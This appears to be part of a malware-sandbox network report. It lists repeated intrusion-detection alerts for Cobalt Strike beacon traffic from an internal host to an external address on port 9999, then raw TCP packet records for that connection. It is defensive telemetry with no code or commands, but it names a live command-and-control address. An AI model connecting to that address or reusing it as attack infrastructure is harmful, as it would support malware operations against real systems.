2024-10-08T04:21:53.763817+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54384	47.239.242.141	9999	TCP
2024-10-08T04:21:54.805717+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54385	47.239.242.141	9999	TCP
2024-10-08T04:21:55.857368+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54386	47.239.242.141	9999	TCP
2024-10-08T04:21:56.876826+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54387	47.239.242.141	9999	TCP
2024-10-08T04:21:57.910870+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54388	47.239.242.141	9999	TCP
2024-10-08T04:21:58.934763+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54389	47.239.242.141	9999	TCP
2024-10-08T04:21:59.968982+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54390	47.239.242.141	9999	TCP
2024-10-08T04:22:01.023406+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54391	47.239.242.141	9999	TCP
2024-10-08T04:22:02.025269+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54392	47.239.242.141	9999	TCP
2024-10-08T04:22:03.159107+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54393	47.239.242.141	9999	TCP
2024-10-08T04:22:04.197965+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54394	47.239.242.141	9999	TCP
2024-10-08T04:22:05.226286+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54395	47.239.242.141	9999	TCP
2024-10-08T04:22:06.264581+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54396	47.239.242.141	9999	TCP
2024-10-08T04:22:07.285140+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54397	47.239.242.141	9999	TCP
2024-10-08T04:22:08.308621+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54398	47.239.242.141	9999	TCP
2024-10-08T04:22:09.370550+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54399	47.239.242.141	9999	TCP
2024-10-08T04:22:10.599979+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54400	47.239.242.141	9999	TCP
2024-10-08T04:22:11.622959+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54401	47.239.242.141	9999	TCP
2024-10-08T04:22:12.633664+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54402	47.239.242.141	9999	TCP
2024-10-08T04:22:13.665927+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54403	47.239.242.141	9999	TCP
2024-10-08T04:22:14.687035+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54404	47.239.242.141	9999	TCP
2024-10-08T04:22:15.709139+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54405	47.239.242.141	9999	TCP
2024-10-08T04:22:16.722522+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54406	47.239.242.141	9999	TCP
2024-10-08T04:22:17.759515+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54407	47.239.242.141	9999	TCP
2024-10-08T04:22:18.771722+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54408	47.239.242.141	9999	TCP
2024-10-08T04:22:19.811672+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54409	47.239.242.141	9999	TCP
2024-10-08T04:22:20.818385+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54410	47.239.242.141	9999	TCP
2024-10-08T04:22:21.899635+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54411	47.239.242.141	9999	TCP
2024-10-08T04:22:22.934011+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54412	47.239.242.141	9999	TCP
2024-10-08T04:22:23.956009+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54413	47.239.242.141	9999	TCP
2024-10-08T04:22:25.011811+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54414	47.239.242.141	9999	TCP
2024-10-08T04:22:26.027322+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54415	47.239.242.141	9999	TCP
2024-10-08T04:22:27.065299+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54416	47.239.242.141	9999	TCP
2024-10-08T04:22:28.116771+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54417	47.239.242.141	9999	TCP
2024-10-08T04:22:29.185167+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54418	47.239.242.141	9999	TCP
2024-10-08T04:22:30.200382+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54419	47.239.242.141	9999	TCP
2024-10-08T04:22:31.211254+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54420	47.239.242.141	9999	TCP
2024-10-08T04:22:32.249745+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54421	47.239.242.141	9999	TCP
2024-10-08T04:22:33.310426+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54422	47.239.242.141	9999	TCP
2024-10-08T04:22:34.338421+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54423	47.239.242.141	9999	TCP
2024-10-08T04:22:35.371677+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54424	47.239.242.141	9999	TCP
2024-10-08T04:22:36.426680+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54425	47.239.242.141	9999	TCP
2024-10-08T04:22:37.441154+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54426	47.239.242.141	9999	TCP
2024-10-08T04:22:38.483986+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54427	47.239.242.141	9999	TCP
2024-10-08T04:22:39.523041+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54428	47.239.242.141	9999	TCP
2024-10-08T04:22:40.594466+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54429	47.239.242.141	9999	TCP
2024-10-08T04:22:41.622443+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54430	47.239.242.141	9999	TCP
2024-10-08T04:22:42.638311+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54431	47.239.242.141	9999	TCP
2024-10-08T04:22:43.648966+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54432	47.239.242.141	9999	TCP
2024-10-08T04:22:44.685703+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54433	47.239.242.141	9999	TCP
2024-10-08T04:22:45.720297+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54434	47.239.242.141	9999	TCP
2024-10-08T04:22:46.730235+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54435	47.239.242.141	9999	TCP
2024-10-08T04:22:47.770490+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54436	47.239.242.141	9999	TCP
2024-10-08T04:22:48.779402+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54437	47.239.242.141	9999	TCP
2024-10-08T04:22:49.830759+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54438	47.239.242.141	9999	TCP
2024-10-08T04:22:50.893078+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54439	47.239.242.141	9999	TCP
2024-10-08T04:22:51.920245+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54440	47.239.242.141	9999	TCP
2024-10-08T04:22:52.959198+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54441	47.239.242.141	9999	TCP
2024-10-08T04:22:53.985101+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54442	47.239.242.141	9999	TCP
2024-10-08T04:22:55.013316+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54443	47.239.242.141	9999	TCP
2024-10-08T04:22:56.037196+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54444	47.239.242.141	9999	TCP
2024-10-08T04:22:57.079631+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54445	47.239.242.141	9999	TCP
2024-10-08T04:22:58.098793+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54446	47.239.242.141	9999	TCP
2024-10-08T04:22:59.161579+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54447	47.239.242.141	9999	TCP
2024-10-08T04:23:00.189223+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54448	47.239.242.141	9999	TCP
2024-10-08T04:23:01.194355+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54449	47.239.242.141	9999	TCP
2024-10-08T04:23:02.244536+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54450	47.239.242.141	9999	TCP
2024-10-08T04:23:03.284242+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54451	47.239.242.141	9999	TCP
2024-10-08T04:23:04.286575+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54452	47.239.242.141	9999	TCP
2024-10-08T04:23:05.622789+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54453	47.239.242.141	9999	TCP
2024-10-08T04:23:06.658163+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54454	47.239.242.141	9999	TCP
2024-10-08T04:23:07.685553+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54455	47.239.242.141	9999	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 04:19:02.208439112 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:02.214659929 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:02.214770079 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:02.214905977 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:02.219841957 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.123648882 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.123667955 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.123675108 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.123681068 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.123687029 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.123696089 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.123703003 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.123752117 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.123760939 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.123764992 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.123769999 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.123908043 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.123908043 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.128720045 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.128736973 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.128774881 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.128819942 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.128842115 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.128901005 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.349572897 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.349586010 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.349594116 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.349659920 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.349675894 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.349685907 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.349694967 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.349704027 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.349767923 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.349767923 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.349767923 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.350408077 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.350416899 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.350425005 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.350462914 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.350481033 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.350485086 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.350490093 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.350534916 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.351154089 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.351206064 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.351231098 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.351279974 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.351484060 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.351492882 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.351500988 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.351542950 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.351577044 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.351901054 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.351908922 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.351919889 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.351957083 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.351960897 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.351970911 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.351994038 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.352034092 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.354597092 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.354645967 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.354650021 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.354688883 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.438057899 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.438076973 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.438158035 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.575212002 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575242043 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575257063 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575264931 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575279951 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575287104 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575300932 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575314999 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575330019 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575344086 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575465918 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.575465918 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.575465918 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.575558901 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575572968 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575588942 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575601101 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.575613976 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575623035 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.575628042 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575643063 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575644970 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.575656891 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575666904 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.575699091 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.575710058 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575722933 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575736046 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575750113 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.575750113 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.575774908 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.575794935 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.576458931 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.576472998 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.576488018 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.576509953 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.576513052 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.576523066 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.576534986 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.576538086 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.576551914 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.576565981 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.576567888 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.576591015 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.576606035 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.576611996 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.576625109 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.576638937 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.576652050 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.576682091 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577339888 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577353001 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577367067 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577393055 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577406883 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577420950 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577426910 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577435017 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577447891 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577477932 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577759027 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577781916 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577796936 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577809095 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577833891 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577847004 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577860117 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577861071 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577874899 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577888012 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577888966 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577903986 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577922106 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577924013 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577934980 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577950001 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.577963114 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577980995 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.577999115 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.663974047 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.663989067 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.664030075 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.664077997 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.799943924 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.799968958 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.799983025 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800015926 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800021887 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800044060 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800051928 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800057888 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800085068 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800086021 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800105095 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800112009 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800128937 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800138950 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800163031 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800179005 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800180912 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800193071 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800215960 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800221920 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800239086 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800246954 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800263882 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800276041 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800302029 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800302982 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800323963 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800328970 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800340891 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800358057 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800380945 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800400019 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800447941 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800461054 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800474882 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800491095 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800509930 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800530910 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800534964 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800549984 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800564051 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800584078 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800594091 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800601006 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800617933 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800630093 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800658941 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800678015 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800901890 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800915956 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800941944 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.800945997 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800962925 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800981998 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.800986052 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801001072 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801027060 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801039934 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801047087 CEST	9999	49730	47.239.242.141	192.168.2.4
